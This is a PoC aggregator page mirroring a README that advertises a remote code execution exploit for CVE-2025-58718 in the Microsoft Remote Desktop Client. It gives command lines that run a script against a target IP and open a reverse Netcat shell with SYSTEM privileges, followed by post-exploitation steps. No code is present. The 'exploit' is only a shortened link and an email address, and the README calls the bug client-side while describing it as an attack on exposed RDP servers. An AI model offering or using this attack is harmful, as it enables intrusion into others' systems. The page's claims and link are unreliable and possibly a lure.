POC详情: 5258e1d91155fce0fcc607bd003dab94a27c1e0d

来源
关联漏洞
标题: Microsoft Remote Desktop Client 资源管理错误漏洞 (CVE-2025-58718)
描述:Microsoft Remote Desktop Client是美国微软(Microsoft)公司的一款远程桌面客户端。 Microsoft Remote Desktop Client存在资源管理错误漏洞,该漏洞源于攻击者利用该漏洞可以远程执行代码。
介绍
# CVE-2025-58718: Remote Desktop Client RCE

## Disclaimer
This tool is for authorized security testing only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical. The authors are not responsible for misuse.

## Exploit Overview
This exploit targets CVE-2025-58718, a use-after-free vulnerability in the Microsoft Remote Desktop Client, enabling remote code execution over a network. It allows an attacker to execute arbitrary code on vulnerable systems by initiating a malformed RDP connection.

The exploit uses crafted RDP packets to trigger the use-after-free condition during the connection handshake, overwriting heap structures to execute a shellcode payload. The provided script includes a reverse TCP shell payload that connects back to a Netcat listener, granting remote access to the target system.

### Key Technical Details
- **Vulnerability Type**: Use-After-Free in RDP protocol handling.
- **Attack Vector**: Network-based, via TCP/3389 (default RDP port).
- **Prerequisites**: Target has Remote Desktop enabled and exposed; no authentication required for exploit trigger.

### Affected Versions
- Windows 10 (1607, 1809, 21H2, 22H2)
- Windows 11 (22H2, 23H2, 24H2, 25H2)
- Windows Server (2008 SP2/R2 SP1, 2012/R2, 2016, 2019, 2022/23H2, 2025)
- Remote Desktop App Client


## Usage
1. **Prerequisites**:
   - Install Python 3.x and dependencies (`pip install -r requirements.txt`).
   - Ensure Netcat (`nc`) is installed on your system.
   - Generate or customize shellcode for your environment (default provided is x64 reverse TCP).
2. **Setup Listener**:
   - The script automatically starts a Netcat listener on the specified port (default: 4444).
   - Ensure your listener IP is reachable by the target (e.g., public IP or same network).
3. **Run Exploit**:
   - Execute: `python cve-2025-58718.py --target <TARGET_IP> --listener-ip <YOUR_IP> --listener-port 4444`.
   - Example: `python cve-2025-58718.py --target 192.168.1.100 --listener-ip 192.168.1.10 --listener-port 4444`.
4. **Monitor**:
   - Check the Netcat listener output for a reverse shell connection.
   - On success, you’ll receive a command shell with SYSTEM privileges.
5. **Post-Exploitation**:
   - Use the shell for further enumeration or privilege escalation (e.g., `whoami`, `net user`).
  
### Exploit

[href](https://tinyurl.com/yjbh9pbc)

For any inquiries, please email me at: eviedejesu803@gmail.com



文件快照

[4.0K] /data/pocs/5258e1d91155fce0fcc607bd003dab94a27c1e0d └── [2.4K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。